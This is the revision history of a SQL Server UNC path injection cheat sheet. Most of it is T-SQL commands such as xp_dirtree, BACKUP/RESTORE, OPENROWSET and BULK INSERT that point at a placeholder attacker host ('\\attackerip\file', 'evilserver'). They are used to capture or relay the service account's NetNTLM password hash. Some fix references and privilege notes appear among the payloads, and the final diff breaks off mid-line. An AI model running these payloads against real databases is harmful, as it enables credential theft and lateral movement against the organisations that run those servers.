nullbind · March 1, 2025 19:51 · Sep 6, 2017 · Sep 6, 2017 · Sep 5, 2017 · Mar 27, 2017
diff --git a/SQL Server UNC Path Injection Cheatsheet b/SQL Server UNC Path Injection Cheatsheet
@@ -199,7 +199,7 @@ FROM OPENROWSET('Microsoft.ACE.OLEDB.12.0',
     'Excel 12.0 Xml;HDR=YES;Database=\\server\temp\Products.xlsx',
     'SELECT * FROM [ProductList$]');
 
--- requires sa
+-- requires sysadmin or db_owner role
 SELECT  * FROM fn_dump_dblog(NULL,NULL,'DISK',1
 ,'\\attackerip\fakefile.bak'
 ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL

diff --git a/SQL Server UNC Path Injection Cheatsheet b/SQL Server UNC Path Injection Cheatsheet
@@ -199,6 +199,17 @@ FROM OPENROWSET('Microsoft.ACE.OLEDB.12.0',
     'Excel 12.0 Xml;HDR=YES;Database=\\server\temp\Products.xlsx',
     'SELECT * FROM [ProductList$]');
 
+-- requires sa
+SELECT  * FROM fn_dump_dblog(NULL,NULL,'DISK',1
+,'\\attackerip\fakefile.bak'
+,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
+,NULL,NULL,NULL,NULL,   NULL,NULL,NULL,NULL,NULL,NULL
+,NULL,NULL,NULL,NULL,   NULL,NULL,NULL,NULL,NULL,NULL
+,NULL,NULL,NULL,NULL,   NULL,NULL,NULL,NULL,NULL,NULL
+,NULL,NULL,NULL,NULL,   NULL,NULL,NULL,NULL,NULL,NULL
+,NULL,NULL,NULL,NULL,   NULL,NULL,NULL,NULL,NULL,NULL
+,NULL,NULL,NULL,NULL)
+
 --OpenDataSource
 -- works on everything since 2k8, requires ad-hoc queries to be enabled, but then it can be run by any login
 - Ref: https://msdn.microsoft.com/en-us/library/ms179856.aspx

diff --git a/SQL Server UNC Path Injection Cheatsheet b/SQL Server UNC Path Injection Cheatsheet
@@ -203,3 +203,9 @@ FROM OPENROWSET('Microsoft.ACE.OLEDB.12.0',
 -- works on everything since 2k8, requires ad-hoc queries to be enabled, but then it can be run by any login
 - Ref: https://msdn.microsoft.com/en-us/library/ms179856.aspx
 SELECT * FROM OPENDATASOURCE('Microsoft.Jet.OLEDB.4.0','Data Source=\\server1\DataFolder\Documents\TestExcel.xls;Extended Properties=EXCEL 5.0')...[Sheet1$] ; 
+
+-- Web Dav Notes
+xp_dirtree '\\hostname@SSL\test' --ssl 443
+xp_dirtree '\\hostname@SSL@1234\test' --ssl port 1234
+xp_dirtree '\\hostname@1234\test' --http
+
diff --git a/SQL Server UNC Path Injection Cheatsheet b/SQL Server UNC Path Injection Cheatsheet
@@ -24,7 +24,7 @@ GO
 
 -- BACKUP Command
 -- Note: The Public role can't actually execute the backup, but the UNC path is resolved prior to the authorization check.
--- Fix: https://technet.microsoft.com/library/security/MS16-131
+-- Fix: https://technet.microsoft.com/library/security/MS16-136, https://technet.microsoft.com/en-us/library/security/mt674627.aspx
 -- Fix note: No patch is available for SQL Server 2000 to 2008, because they are on longer supported. Upgrade if this is you.
 
 BACKUP LOG [TESTING] TO DISK = '\\attackerip\file'
@@ -35,7 +35,7 @@ GO
 
 -- RESTORE Command 
 -- Note: The Public role can't actually execute the RESTORE, but the UNC path is resolved prior to the authorization check.
--- Fix: https://technet.microsoft.com/library/security/MS16-131
+-- Fix: https://technet.microsoft.com/library/security/MS16-136, https://technet.microsoft.com/en-us/library/security/mt674627.aspx
 -- Fix note: No patch is available for SQL Server 2000 to 2008, because they are on longer supported. Upgrade if this is you.
 
 RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file'

diff --git a/SQL Server UNC Path Injection Cheatsheet b/SQL Server UNC Path Injection Cheatsheet
@@ -178,6 +178,26 @@ SELECT * --INTO #productlist
 FROM OPENROWSET('Microsoft.Jet.OLEDB.4.0',
     'Excel 8.0;HDR=YES;Database=\\server\temp\Products.xls',
     'select * from [ProductList$]');
+
+Source: https://www.experts-exchange.com/articles/3025/Retrieving-Data-From-Excel-Using-OPENROWSET.html
+
+--old Excel with new ACE driver - working query 1 (unc injection)
+SELECT * --INTO #productlist
+FROM OPENROWSET('Microsoft.ACE.OLEDB.12.0',
+    'Excel 8.0;HDR=YES;Database=\\server\temp\Products.xls',
+    'SELECT * FROM [ProductList$]');
+
+--old Excel with new ACE driver - working query 2 (unc injection)
+SELECT * --INTO #productlist
+FROM OPENROWSET('Microsoft.ACE.OLEDB.12.0',
+    'Excel 12.0;HDR=YES;Database=\\server\temp\Products.xls',
+    'SELECT * FROM [ProductList$]');
+
+--(unc injection)
+SELECT * --INTO #productlist
+FROM OPENROWSET('Microsoft.ACE.OLEDB.12.0',
+    'Excel 12.0 Xml;HDR=YES;Database=\\server\temp\Products.xlsx',
+    'SELECT * FROM [ProductList$]');
 
 --OpenDataSource
 -- works on everything since 2k8, requires ad-hoc queries to be enabled, but then it can be run by any login

diff --git a/SQL Server UNC Path Injection Cheatsheet b/SQL Server UNC Path Injection Cheatsheet
@@ -147,7 +147,8 @@ xp_cmdshell 'dir \\attackerip\file'
 
 
 -- OpenRowSet 
-General Notes: 
+General Notes:
+- 2k5 and up
 - You must be a sysadmin. Running the TSQL below with can be used to capture the SQL Server service account password hash.
 - This can also be used to transparently execute commands on remote SQL Servers; IF the servers share a service account and you are running as a sysadmin. This is just exploiting shared service accounts in a new way.
 
@@ -158,8 +159,27 @@ EXEC sp_configure 'ad hoc distributed queries', 1
 RECONFIGURE
 GO
 
+-- passthrough sql service auth if your a sysadmin
 DECLARE @sql NVARCHAR(MAX)
-
 set @sql = 'select a.* from openrowset(''SQLNCLI'', ''Server=evilserver;Trusted_Connection=yes;'', ''select * from master.dbo.sysdatabases'') as a'
 select @sql
-EXEC sp_executeSQL @sql
+EXEC sp_executeSQL @sql
+
+--Excel 2007-2010 (unc injection)
+-- requires ad-hoc queries to be enabled, but then it can be run by any login
+SELECT * --INTO #productlist
+FROM OPENROWSET('Microsoft.ACE.OLEDB.12.0',
+    'Excel 12.0 Xml;HDR=YES;Database=\\server\temp\Products.xlsx',
+    'SELECT * FROM [ProductList$]');
+
+--Excel 97-2003(unc injection)
+-- requires ad-hoc queries to be enabled, but then it can be run by any login
+SELECT * --INTO #productlist
+FROM OPENROWSET('Microsoft.Jet.OLEDB.4.0',
+    'Excel 8.0;HDR=YES;Database=\\server\temp\Products.xls',
+    'select * from [ProductList$]');
+
+--OpenDataSource
+-- works on everything since 2k8, requires ad-hoc queries to be enabled, but then it can be run by any login
+- Ref: https://msdn.microsoft.com/en-us/library/ms179856.aspx
+SELECT * FROM OPENDATASOURCE('Microsoft.Jet.OLEDB.4.0','Data Source=\\server1\DataFolder\Documents\TestExcel.xls;Extended Properties=EXCEL 5.0')...[Sheet1$] ; 
diff --git a/SQL Server UNC Path Injection Cheatsheet b/SQL Server UNC Path Injection Cheatsheet
@@ -143,4 +143,23 @@ GO
 xp_subdirs '\\attackerip\file'
 
 -- xp_cmdshell 
-xp_cmdshell 'dir \\attackerip\file'
+xp_cmdshell 'dir \\attackerip\file'
+
+
+-- OpenRowSet 
+General Notes: 
+- You must be a sysadmin. Running the TSQL below with can be used to capture the SQL Server service account password hash.
+- This can also be used to transparently execute commands on remote SQL Servers; IF the servers share a service account and you are running as a sysadmin. This is just exploiting shared service accounts in a new way.
+
+EXEC sp_configure 'show advanced options', 1
+RECONFIGURE
+GO
+EXEC sp_configure 'ad hoc distributed queries', 1
+RECONFIGURE
+GO
+
+DECLARE @sql NVARCHAR(MAX)
+
+set @sql = 'select a.* from openrowset(''SQLNCLI'', ''Server=evilserver;Trusted_Connection=yes;'', ''select * from master.dbo.sysdatabases'') as a'
+select @sql
+EXEC sp_executeSQL @sql
diff --git a/SQL Server UNC Path Injection Cheatsheet b/SQL Server UNC Path Injection Cheatsheet
@@ -137,4 +137,10 @@ GO
 
 -- External file format - Azure only
 CREATE EXTERNAL FILE FORMAT myfileformat WITH (FORMATFILE = '\\testing21\file');
-GO 
+GO 
+
+-- xp_subdirs
+xp_subdirs '\\attackerip\file'
+
+-- xp_cmdshell 
+xp_cmdshell 'dir \\attackerip\file'
diff --git a/SQL Server UNC Path Injection Cheatsheet b/SQL Server UNC Path Injection Cheatsheet
@@ -137,10 +137,4 @@ GO
 
 -- External file format - Azure only
 CREATE EXTERNAL FILE FORMAT myfileformat WITH (FORMATFILE = '\\testing21\file');
-GO 
-
--- xp_regwrite has write privilegs to recursively (for the most part)
--- there are a number of backup and logging file paths that could be used to UNC path injection
-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft SQL Server\<INSTANCE> 
-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Services\SQLAgent$<INSTANCE>
-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft SQL Server\80\Replication
+GO 
diff --git a/SQL Server UNC Path Injection Cheatsheet b/SQL Server UNC Path Injection Cheatsheet
@@ -1,73 +1,61 @@
---
--- Short list of SQL Server commands that support UNC path [injections] by default
--- Note: This is not a complete list.
---
-
---------------------------------------------------------
--- Executable by the Public fixed server role by default
---------------------------------------------------------
--- Note: All are supported by SQL Server 2000 to 2014
-
--- Get directory listing
--- Fix: revoke execute on xp_dirtree to public
+This is a list of SQL Server commands that support UNC path [injections] by default.
+The injections can be used to capture or replay the NetNTLM password hash of the
+Windows account used to run the SQL Server service. The SQL Server service account 
+has sysadmin privileges by default in all versions of SQL Server.
+
+Note: This list is most likely not complete.
+
+-----------------------------------------------------------------------
+-- UNC Path Injections Executable by the Public Fixed Server Role 
+-----------------------------------------------------------------------
+-- Note: All are supported by SQL Server 2000 to 2016 (excluding azure)
+
+-- XP_DIRTREE Extended Stored Procedure
+-- Fix: "revoke execute on xp_dirtree to public"
+
 xp_dirtree '\\attackerip\file'
 GO
 
--- Check if file exists
--- Fix: revoke execute on xp_fileexist to public
+-- XP_FILEEXIST Extended Stored Procedure
+-- Fix: "revoke execute on xp_fileexist to public"
+
 xp_fileexist '\\attackerip\file'
 GO
 
--- Backup to file - Database Log
--- Note: Public can't actually execute the backup, but the UNC path is resolved first
+-- BACKUP Command
+-- Note: The Public role can't actually execute the backup, but the UNC path is resolved prior to the authorization check.
 -- Fix: https://technet.microsoft.com/library/security/MS16-131
+-- Fix note: No patch is available for SQL Server 2000 to 2008, because they are on longer supported. Upgrade if this is you.
+
 BACKUP LOG [TESTING] TO DISK = '\\attackerip\file'
 GO
 
--- Backup to file - Database
--- Note: Public can't actually execute the backup, but the UNC path is resolved first
--- Fix: https://technet.microsoft.com/library/security/MS16-131
 BACKUP DATABASE [TESTING] TO DISK = '\\attackeri\file'
 GO
 
--- Restore from file - Log
--- Note: Public can't actually execute the restore, but the UNC path is resolved first
+-- RESTORE Command 
+-- Note: The Public role can't actually execute the RESTORE, but the UNC path is resolved prior to the authorization check.
 -- Fix: https://technet.microsoft.com/library/security/MS16-131
+-- Fix note: No patch is available for SQL Server 2000 to 2008, because they are on longer supported. Upgrade if this is you.
+
 RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file'
+GO
 
--- Restore from file - Database
--- Note: Public can't actually execute the restore, but the UNC path is resolved first
--- Fix: https://technet.microsoft.com/library/security/MS16-131
 RESTORE DATABASE [TESTING] FROM DISK = '\\attackerip\file'
 GO
 
--- Restore from file - HEADERONLY
--- Note: Public can't actually execute the restore, but the UNC path is resolved first
--- Fix: https://technet.microsoft.com/library/security/MS16-131
 RESTORE HEADERONLY FROM DISK = '\\attackerip\file'
 GO
 
--- Restore from file - FILELISTONLY
--- Note: Public can't actually execute the restore, but the UNC path is resolved first
--- Fix: https://technet.microsoft.com/library/security/MS16-131
 RESTORE FILELISTONLY FROM DISK = '\\attackerip\file'
 GO
 
--- Restore from file - LABELONLY 
--- Note: Public can't actually execute the restore, but the UNC path is resolved first
--- Fix: https://technet.microsoft.com/library/security/MS16-131
 RESTORE LABELONLY FROM DISK = '\\attackerip\file'
 GO
 
--- Restore from file - REWINDONLY 
--- Note: Public can't actually execute the restore, but the UNC path is resolved first
--- Fix: https://technet.microsoft.com/library/security/MS16-131
 RESTORE REWINDONLY FROM DISK = '\\attackerip\file'
 GO
 
--- Restore from file - VERIFYONLY
--- Note: Public can't actually execute the restore, but the UNC path is resolved first
--- Fix: https://technet.microsoft.com/library/security/MS16-131
 RESTORE VERIFYONLY FROM DISK = '\\attackerip\file'
 GO
 

diff --git a/SQL Server UNC Path Injections → SQL Server UNC Path Injection Cheatsheet b/SQL Server UNC Path Injections → SQL Server UNC Path Injection Cheatsheet
diff --git a/SQL Server UNC Path Injections b/SQL Server UNC Path Injections
@@ -1 +1,158 @@
----- Short list of SQL Server commands that support UNC path [injections] by default-- Note: This is not a complete list.------------------------------------------------------------ Executable by the Public fixed server role by default---------------------------------------------------------- Note: All are supported by SQL Server 2000 to 2014-- Get directory listing-- Fix: revoke execute on xp_dirtree to publicxp_dirtree '\\attackerip\file'GO-- Check if file exists-- Fix: revoke execute on xp_fileexist to publicxp_fileexist '\\attackerip\file'GO-- Backup to file - Database Log-- Note: Public can't actually execute the backup, but the UNC path is resolved first-- Fix: https://technet.microsoft.com/library/security/MS16-131BACKUP LOG [TESTING] TO DISK = '\\attackerip\file'GO-- Backup to file - Database-- Note: Public can't actually execute the backup, but the UNC path is resolved first-- Fix: https://technet.microsoft.com/library/security/MS16-131BACKUP DATABASE [TESTING] TO DISK = '\\attackeri\file'GO-- Restore from file - Log-- Note: Public can't actually execute the restore, but the UNC path is resolved first-- Fix: https://technet.microsoft.com/library/security/MS16-131RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file'-- Restore from file - Database-- Note: Public can't actually execute the restore, but the UNC path is resolved first-- Fix: https://technet.microsoft.com/library/security/MS16-131RESTORE DATABASE [TESTING] FROM DISK = '\\attackerip\file'GO-- Restore from file - HEADERONLY-- Note: Public can't actually execute the restore, but the UNC path is resolved first-- Fix: https://technet.microsoft.com/library/security/MS16-131RESTORE HEADERONLY FROM DISK = '\\attackerip\file'GO-- Restore from file - FILELISTONLY-- Note: Public can't actually execute the restore, but the UNC path is resolved first-- Fix: https://technet.microsoft.com/library/security/MS16-131RESTORE FILELISTONLY FROM DISK = '\\attackerip\file'GO-- Restore from file - LABELONLY -- Note: Public can't actually execute the restore, but the UNC path is resolved first-- Fix: https://technet.microsoft.com/library/security/MS16-131RESTORE LABELONLY FROM DISK = '\\attackerip\file'GO-- Restore from file - REWINDONLY -- Note: Public can't actually execute the restore, but the UNC path is resolved first-- Fix: https://technet.microsoft.com/library/security/MS16-131RESTORE REWINDONLY FROM DISK = '\\attackerip\file'GO-- Restore from file - VERIFYONLY-- Note: Public can't actually execute the restore, but the UNC path is resolved first-- Fix: https://technet.microsoft.com/library/security/MS16-131RESTORE VERIFYONLY FROM DISK = '\\attackerip\file'GO-------------------------------------------------------- Executable by the Sysadmin fixed server-- and with other non Public roles / privileges-------------------------------------------------------- Note: Almost every function and stored procedure that supports a file path allows UNC paths by design.-- Create assemblyCREATE ASSEMBLY HelloWorld FROM '\\attackerip\file' WITH PERMISSION_SET = SAFE;  GO-- Add exteneded stored proceduresp_addextendedproc 'xp_hello','\\attackerip\file'-- Create CertificateCREATE CERTIFICATE testing123      FROM EXECUTABLE FILE = '\\attackerip\file';GO  -- Backup CertificateBACKUP CERTIFICATE test01 TO FILE = '\\attackerip\file' WITH PRIVATE KEY (decryption by password = 'superpassword', FILE = '\\attackerip\file', encryption by password = 'superpassword');go-- Backup to file - Master KeyBACKUP MASTER KEY TO FILE = '\\attackerip\file' ENCRYPTION BY PASSWORD = 'password'GO-- Backup to file - Service Master KeyBACKUP SERVICE MASTER KEY TO FILE = '\\attackerip\file' ENCRYPTION BY PASSWORD = 'password'go-- Restore from file - Master KeyRESTORE MASTER KEY FROM FILE = '\\attackerip\file' DECRYPTION BY PASSWORD = 'password' ENCRYPTION BY PASSWORD = 'password'go-- Restore from file - Service Master KeyRESTORE SERVICE MASTER KEY FROM FILE = '\\attackerip\file' DECRYPTION BY PASSWORD = 'password'go-- Read data from file - Bulk insert 1CREATE TABLE #TEXTFILE (column1 NVARCHAR(100))BULK INSERT #TEXTFILE FROM '\\attackerip\file' DROP TABLE #TEXTFILE-- Read data from file - Bulk insert 2CREATE TABLE #TEXTFILE (column1 NVARCHAR(100))BULK INSERT #TEXTFILE FROM '\\attackerip\file' WITH (FORMATFILE = '\\testing21\file')DROP TABLE #TEXTFILE-- Read data from a file - fn_xe_file_target_read_fileSELECT * FROM sys.fn_xe_file_target_read_file ('\\attackerip\file','\\attackerip\file',null,null)GO-- Read data from a file - fn_get_audit_fileSELECT * FROM sys.fn_get_audit_file ('\\attackerip\file','\\attackerip\file',default,default);  GO  -- Create Server Audit to FileCREATE SERVER AUDIT TESTING TO FILE ( FILEPATH = '\\attackerip\file');GO-- Install a cryptographic provider  sp_configure 'EKM provider enabled',1RECONFIGUREGOCREATE CRYPTOGRAPHIC PROVIDER SecurityProvider FROM FILE = '\\attackerip\file';  GO-- External file format - Azure onlyCREATE EXTERNAL FILE FORMAT myfileformat WITH (FORMATFILE = '\\testing21\file');GO -- xp_regwrite has write privilegs to recursively (for the most part)-- there are a number of backup and logging file paths that could be used to UNC path injectionHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft SQL Server\<INSTANCE> HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Services\SQLAgent$<INSTANCE>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft SQL Server\80\Replication
+--
+-- Short list of SQL Server commands that support UNC path [injections] by default
+-- Note: This is not a complete list.
+--
+
+--------------------------------------------------------
+-- Executable by the Public fixed server role by default
+--------------------------------------------------------
+-- Note: All are supported by SQL Server 2000 to 2014
+
+-- Get directory listing
+-- Fix: revoke execute on xp_dirtree to public
+xp_dirtree '\\attackerip\file'
+GO
+
+-- Check if file exists
+-- Fix: revoke execute on xp_fileexist to public
+xp_fileexist '\\attackerip\file'
+GO
+
+-- Backup to file - Database Log
+-- Note: Public can't actually execute the backup, but the UNC path is resolved first
+-- Fix: https://technet.microsoft.com/library/security/MS16-131
+BACKUP LOG [TESTING] TO DISK = '\\attackerip\file'
+GO
+
+-- Backup to file - Database
+-- Note: Public can't actually execute the backup, but the UNC path is resolved first
+-- Fix: https://technet.microsoft.com/library/security/MS16-131
+BACKUP DATABASE [TESTING] TO DISK = '\\attackeri\file'
+GO
+
+-- Restore from file - Log
+-- Note: Public can't actually execute the restore, but the UNC path is resolved first
+-- Fix: https://technet.microsoft.com/library/security/MS16-131
+RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file'
+
+-- Restore from file - Database
+-- Note: Public can't actually execute the restore, but the UNC path is resolved first
+-- Fix: https://technet.microsoft.com/library/security/MS16-131
+RESTORE DATABASE [TESTING] FROM DISK = '\\attackerip\file'
+GO
+
+-- Restore from file - HEADERONLY
+-- Note: Public can't actually execute the restore, but the UNC path is resolved first
+-- Fix: https://technet.microsoft.com/library/security/MS16-131
+RESTORE HEADERONLY FROM DISK = '\\attackerip\file'
+GO
+
+-- Restore from file - FILELISTONLY
+-- Note: Public can't actually execute the restore, but the UNC path is resolved first
+-- Fix: https://technet.microsoft.com/library/security/MS16-131
+RESTORE FILELISTONLY FROM DISK = '\\attackerip\file'
+GO
+
+-- Restore from file - LABELONLY 
+-- Note: Public can't actually execute the restore, but the UNC path is resolved first
+-- Fix: https://technet.microsoft.com/library/security/MS16-131
+RESTORE LABELONLY FROM DISK = '\\attackerip\file'
+GO
+
+-- Restore from file - REWINDONLY 
+-- Note: Public can't actually execute the restore, but the UNC path is resolved first
+-- Fix: https://technet.microsoft.com/library/security/MS16-131
+RESTORE REWINDONLY FROM DISK = '\\attackerip\file'
+GO
+
+-- Restore from file - VERIFYONLY
+-- Note: Public can't actually execute the restore, but the UNC path is resolved first
+-- Fix: https://technet.microsoft.com/library/security/MS16-131
+RESTORE VERIFYONLY FROM DISK = '\\attackerip\file'
+GO
+
+------------------------------------------------------
+-- Executable by the Sysadmin fixed server
+-- and with other non Public roles / privileges
+------------------------------------------------------
+-- Note: Almost every function and stored procedure that supports a file path allows UNC paths by design.
+
+-- Create assembly
+CREATE ASSEMBLY HelloWorld FROM '\\attackerip\file' WITH PERMISSION_SET = SAFE;  
+GO
+
+-- Add exteneded stored procedure
+sp_addextendedproc 'xp_hello','\\attackerip\file'
+
+-- Create Certificate
+CREATE CERTIFICATE testing123  
+    FROM EXECUTABLE FILE = '\\attackerip\file';
+GO  
+
+-- Backup Certificate
+BACKUP CERTIFICATE test01 TO FILE = '\\attackerip\file'
+	WITH PRIVATE KEY (decryption by password = 'superpassword',
+	FILE = '\\attackerip\file',
+	encryption by password = 'superpassword');
+go
+
+-- Backup to file - Master Key
+BACKUP MASTER KEY TO FILE = '\\attackerip\file'
+	ENCRYPTION BY PASSWORD = 'password'
+GO
+
+-- Backup to file - Service Master Key
+BACKUP SERVICE MASTER KEY TO FILE = '\\attackerip\file'
+	ENCRYPTION BY PASSWORD = 'password'
+go
+
+-- Restore from file - Master Key
+RESTORE MASTER KEY FROM FILE = '\\attackerip\file'
+	DECRYPTION BY PASSWORD = 'password'
+	ENCRYPTION BY PASSWORD = 'password'
+go
+
+-- Restore from file - Service Master Key
+RESTORE SERVICE MASTER KEY FROM FILE = '\\attackerip\file'
+	DECRYPTION BY PASSWORD = 'password'
+go
+
+-- Read data from file - Bulk insert 1
+CREATE TABLE #TEXTFILE (column1 NVARCHAR(100))
+BULK INSERT #TEXTFILE FROM '\\attackerip\file' 
+DROP TABLE #TEXTFILE
+
+-- Read data from file - Bulk insert 2
+CREATE TABLE #TEXTFILE (column1 NVARCHAR(100))
+BULK INSERT #TEXTFILE FROM '\\attackerip\file' 
+WITH (FORMATFILE = '\\testing21\file')
+DROP TABLE #TEXTFILE
+
+-- Read data from a file - fn_xe_file_target_read_file
+SELECT * FROM sys.fn_xe_file_target_read_file ('\\attackerip\file','\\attackerip\file',null,null)
+GO
+
+-- Read data from a file - fn_get_audit_file
+SELECT * FROM sys.fn_get_audit_file ('\\attackerip\file','\\attackerip\file',default,default);  
+GO  
+
+-- Create Server Audit to File
+CREATE SERVER AUDIT TESTING TO FILE ( FILEPATH = '\\attackerip\file');
+GO
+
+-- Install a cryptographic provider  
+sp_configure 'EKM provider enabled',1
+RECONFIGURE
+GO
+CREATE CRYPTOGRAPHIC PROVIDER SecurityProvider FROM FILE = '\\attackerip\file';  
+GO
+
+-- External file format - Azure only
+CREATE EXTERNAL FILE FORMAT myfileformat WITH (FORMATFILE = '\\testing21\file');
+GO 
+
+-- xp_regwrite has write privilegs to recursively (for the most part)
+-- there are a number of backup and logging file paths that could be used to UNC path injection
+HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft SQL Server\<INSTANCE> 
+HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Services\SQLAgent$<INSTANCE>
+HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft SQL Server\80\Replication
diff --git a/SQL Server UNC Path Injections b/SQL Server UNC Path Injections
@@ -1,148 +1 @@
-
---
--- Short list of SQL Server commands that support UNC path [injections] by default
--- Note: This is not a complete list.
---
-
---------------------------------------------------------
--- Executable by the Public fixed server role by default
---------------------------------------------------------
--- Note: All are supported by SQL Server 2000 to 2014
-
--- Get directory listing
-xp_dirtree '\\attackerip\file'
-GO
-
--- Check if file exists
-xp_fileexist '\\attackerip\file'
-GO
-
--- Backup to file - Database Log
--- Note: Public can't actually execute the backup, but the UNC path is resolved first
-BACKUP LOG [TESTING] TO DISK = '\\attackerip\file'
-GO
-
--- Backup to file - Database
--- Note: Public can't actually execute the backup, but the UNC path is resolved first
-BACKUP DATABASE [TESTING] TO DISK = '\\attackeri\file'
-GO
-
--- Restore from file - Log
--- Note: Public can't actually execute the restore, but the UNC path is resolved first
-RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file'
-
--- Restore from file - Database
--- Note: Public can't actually execute the restore, but the UNC path is resolved first
-RESTORE DATABASE [TESTING] FROM DISK = '\\attackerip\file'
-GO
-
--- Restore from file - HEADERONLY
--- Note: Public can't actually execute the restore, but the UNC path is resolved first
-RESTORE HEADERONLY FROM DISK = '\\attackerip\file'
-GO
-
--- Restore from file - FILELISTONLY
--- Note: Public can't actually execute the restore, but the UNC path is resolved first
-RESTORE FILELISTONLY FROM DISK = '\\attackerip\file'
-GO
-
--- Restore from file - LABELONLY 
--- Note: Public can't actually execute the restore, but the UNC path is resolved first
-RESTORE LABELONLY FROM DISK = '\\attackerip\file'
-GO
-
--- Restore from file - REWINDONLY 
--- Note: Public can't actually execute the restore, but the UNC path is resolved first
-RESTORE REWINDONLY FROM DISK = '\\attackerip\file'
-GO
-
--- Restore from file - VERIFYONLY
--- Note: Public can't actually execute the restore, but the UNC path is resolved first
-RESTORE VERIFYONLY FROM DISK = '\\attackerip\file'
-GO
-
-------------------------------------------------------
--- Executable by the Sysadmin fixed server
--- and with other roles / privileges
-------------------------------------------------------
--- Note: Almost every function and stored procedure that supports a file path allows UNC paths by design.
-
--- Create assembly
-CREATE ASSEMBLY HelloWorld FROM '\\attackerip\file' WITH PERMISSION_SET = SAFE;  
-GO
-
--- Add exteneded stored procedure
-sp_addextendedproc 'xp_hello','\\attackerip\file'
-
--- Create Certificate
-CREATE CERTIFICATE testing123  
-    FROM EXECUTABLE FILE = '\\attackerip\file';
-GO  
-
--- Backup Certificate
-BACKUP CERTIFICATE test01 TO FILE = '\\attackerip\file'
-	WITH PRIVATE KEY (decryption by password = 'superpassword',
-	FILE = '\\attackerip\file',
-	encryption by password = 'superpassword');
-go
-
--- Backup to file - Master Key
-BACKUP MASTER KEY TO FILE = '\\attackerip\file'
-	ENCRYPTION BY PASSWORD = 'password'
-GO
-
--- Backup to file - Service Master Key
-BACKUP SERVICE MASTER KEY TO FILE = '\\attackerip\file'
-	ENCRYPTION BY PASSWORD = 'password'
-go
-
--- Restore from file - Master Key
-RESTORE MASTER KEY FROM FILE = '\\attackerip\file'
-	DECRYPTION BY PASSWORD = 'password'
-	ENCRYPTION BY PASSWORD = 'password'
-go
-
--- Restore from file - Service Master Key
-RESTORE SERVICE MASTER KEY FROM FILE = '\\attackerip\file'
-	DECRYPTION BY PASSWORD = 'password'
-go
-
--- Read data from file - Bulk insert 1
-CREATE TABLE #TEXTFILE (column1 NVARCHAR(100))
-BULK INSERT #TEXTFILE FROM '\\attackerip\file' 
-DROP TABLE #TEXTFILE
-
--- Read data from file - Bulk insert 2
-CREATE TABLE #TEXTFILE (column1 NVARCHAR(100))
-BULK INSERT #TEXTFILE FROM '\\attackerip\file' 
-WITH (FORMATFILE = '\\testing21\file')
-DROP TABLE #TEXTFILE
-
--- Read data from a file - fn_xe_file_target_read_file
-SELECT * FROM sys.fn_xe_file_target_read_file ('\\attackerip\file','\\attackerip\file',null,null)
-GO
-
--- Read data from a file - fn_get_audit_file
-SELECT * FROM sys.fn_get_audit_file ('\\attackerip\file','\\attackerip\file',default,default);  
-GO  
-
--- Create Server Audit to File
-CREATE SERVER AUDIT TESTING TO FILE ( FILEPATH = '\\attackerip\file');
-GO
-
--- Install a cryptographic provider  
-sp_configure 'EKM provider enabled',1
-RECONFIGURE
-GO
-CREATE CRYPTOGRAPHIC PROVIDER SecurityProvider FROM FILE = '\\attackerip\file';  
-GO
-
--- External file format - Azure only
-CREATE EXTERNAL FILE FORMAT myfileformat WITH (FORMATFILE = '\\testing21\file');
-GO 
-
--- xp_regwrite has write privilegs to recursively (for the most part)
--- there are a number of backup and logging file paths that could be used to UNC path injection
-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft SQL Server\<INSTANCE> 
-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Services\SQLAgent$<INSTANCE>
-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft SQL Server\80\Replication
+---- Short list of SQL Server commands that support UNC path [injections] by default-- Note: This is not a complete list.------------------------------------------------------------ Executable by the Public fixed server role by default---------------------------------------------------------- Note: All are supported by SQL Server 2000 to 2014-- Get directory listing-- Fix: revoke execute on xp_dirtree to publicxp_dirtree '\\attackerip\file'GO-- Check if file exists-- Fix: revoke execute on xp_fileexist to publicxp_fileexist '\\attackerip\file'GO-- Backup to file - Database Log-- Note: Public can't actually execute the backup, but the UNC path is resolved first-- Fix: https://technet.microsoft.com/library/security/MS16-131BACKUP LOG [TESTING] TO DISK = '\\attackerip\file'GO-- Backup to file - Database-- Note: Public can't actually execute the backup, but the UNC path is resolved first-- Fix: https://technet.microsoft.com/library/security/MS16-131BACKUP DATABASE [TESTING] TO DISK = '\\attackeri\file'GO-- Restore from file - Log-- Note: Public can't actually execute the restore, but the UNC path is resolved first-- Fix: https://technet.microsoft.com/library/security/MS16-131RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file'-- Restore from file - Database-- Note: Public can't actually execute the restore, but the UNC path is resolved first-- Fix: https://technet.microsoft.com/library/security/MS16-131RESTORE DATABASE [TESTING] FROM DISK = '\\attackerip\file'GO-- Restore from file - HEADERONLY-- Note: Public can't actually execute the restore, but the UNC path is resolved first-- Fix: https://technet.microsoft.com/library/security/MS16-131RESTORE HEADERONLY FROM DISK = '\\attackerip\file'GO-- Restore from file - FILELISTONLY-- Note: Public can't actually execute the restore, but the UNC path is resolved first-- Fix: https://technet.microsoft.com/library/security/MS16-131RESTORE FILELISTONLY FROM DISK = '\\attackerip\file'GO-- Restore from file - LABELONLY -- Note: Public can't actually execute the restore, but the UNC path is resolved first-- Fix: https://technet.microsoft.com/library/security/MS16-131RESTORE LABELONLY FROM DISK = '\\attackerip\file'GO-- Restore from file - REWINDONLY -- Note: Public can't actually execute the restore, but the UNC path is resolved first-- Fix: 